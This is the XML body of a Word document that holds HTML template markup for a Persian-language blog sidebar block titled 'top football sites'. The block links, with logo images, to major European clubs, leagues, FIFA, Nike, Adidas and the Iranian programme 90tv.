    <w:p w14:paraId="0367C94C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Category End--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA220F5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="49D72142" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="5D23BB0A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Blocks Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB5536" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;section class="blocks"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1990C5A5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="61FB1A4A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;!--Hypertemp.iR Channel Start--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792C706E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    &lt;RB:Custom_Html_Block&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E22D37" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve">      &lt;div id="body"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ED5731" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  &lt;div id="titlee"&gt;&lt;i class="fa fa-th-list fa-2x"&gt;&lt;/i&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>سايتهاي برتر فوتبال</w:t>
      </w:r>
      <w:r>
        <w:t>&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4736E631" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve"> &lt;span class="brd"&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2029B527" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t>&lt;div style="background:#233545;border-radius:4px;padding:2px;opacity:0.8;text-align: center;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B175A5A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve"> &lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه بايرن مونيخ آلمان</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" href="http://www.fcbayern.de" style="text-decoration: none;"&gt;&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/bayern.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F22FF2" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه بارسلونا اسپانيا</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.fcbarcelona.com/" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B263D7D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/barcelona.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  &lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه آرسنال انگلستان</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.arsenal.com/index.asp" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3511D7CD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/arsensl.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0890A2D3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه چلسي انگلستان</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.chelseafc.com/xxchelsea180706/index.html" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC339D7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/chelsea.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8EC7FE" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه اينتر ميلان ايتاليا</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.inter.it" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539B41C6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/inter.gif" border="0" height="40" width="40"&gt;&lt;/a&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0637355B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه آ ث ميلان ايتاليا</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.acmilan.com/index.aspx" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F06912B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/milan.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FBDF70" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C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&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه رئال مادريد اسپانيا</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.realmadrid.com/portada_eng.htm" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB783BC" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/real.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  &lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه منچستر يونايند انگليس</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.man-utd.com" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0145980C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/man_utd.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E6A22E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه فيورنتينا ايتاليا</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.acffiorentina.it/it/" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE8A3CA" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/fiorentina.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E062F7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/lazio.gif" border="0" height="40" width="40"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69414464" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:t xml:space="preserve"> &lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه پارما ايتاليا</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">" href="http://www.fcparma.com/it/" style="text-decoration: none;"&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E9A60B" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/parma.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2993B52F" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه گالاتاسراي تركيه</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.galatasaray.org/" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229AA6F7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/gala.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220411DF" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه آث رم ايتاليا</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.asroma.it" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112E5E13" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/roma.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADBAC03" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه ليورپول انگلستان</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.liverpoolfc.tv/splash/reg-120107-correctdetails.htm" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1862AFE8" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://rozup.ir/view/1891125/lvepsssool.jpg" border="0" height="40" width="40"&gt;&lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D030F54" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه والنسيا اسپانيا</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.valenciacf.es" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196FDE43" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/valencia.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE7486" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه بنفيكا پرتقال</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.slbenfica.pt" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B91DC3" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/benfica.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B776AB" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>باشگاه آ‍ژاكس هلند</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.ajax.nl" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475033C5" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/teams/ajax.gif" border="0" height="40" width="40"&gt;&lt;/a&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADEE880" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>وب سايت شركت نايك</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://nikefootball.nike.com/" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048A71D6" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/nike.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3DD19E" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a href="http://www.adidas.com/ae/shared/brandselector.asp" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349F810D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/adidas.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6626A3B7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>وب سايت برنامه نود</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://90tv.ir" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73639512" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/90.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5ABB77" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>وب سايت ليگ برتر انگلستان</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.premierleague.com" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D69BAD" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/pre_liague.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091EEE5A" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>وب سايت بوندس ليگا</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.bundesliga.de" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AAB682" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/bundesliga.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A285B76" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="2949AD97" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>وب سايت فيفا</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.fifa.com" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A953DAB" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/fifa.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6B8B5C" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3"/>
    <w:p w14:paraId="2ACE11C7" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>وب سايت كاچيو (ليگ باشگاهااي ايتاليا)</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.lega-calcio.it" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8CD277" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/caltio.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B72EA89" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>&lt;a title="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:rtl/>
        </w:rPr>
        <w:t>وب سايت لا ليگا (ليگ فوتبالاسپانيا)</w:t>
      </w:r>
      <w:r>
        <w:t>" href="http://www.lfp.es" style="text-decoration: none;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C524D" w14:textId="77777777" w:rsidR="007D51C3" w:rsidRDefault="007D51C3" w:rsidP="007D51C3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">&lt;img src="http://festival.persiangig.com/image/persepolis/new_pers/lfp.gif" border="0" height="40" width="40"&gt;&lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
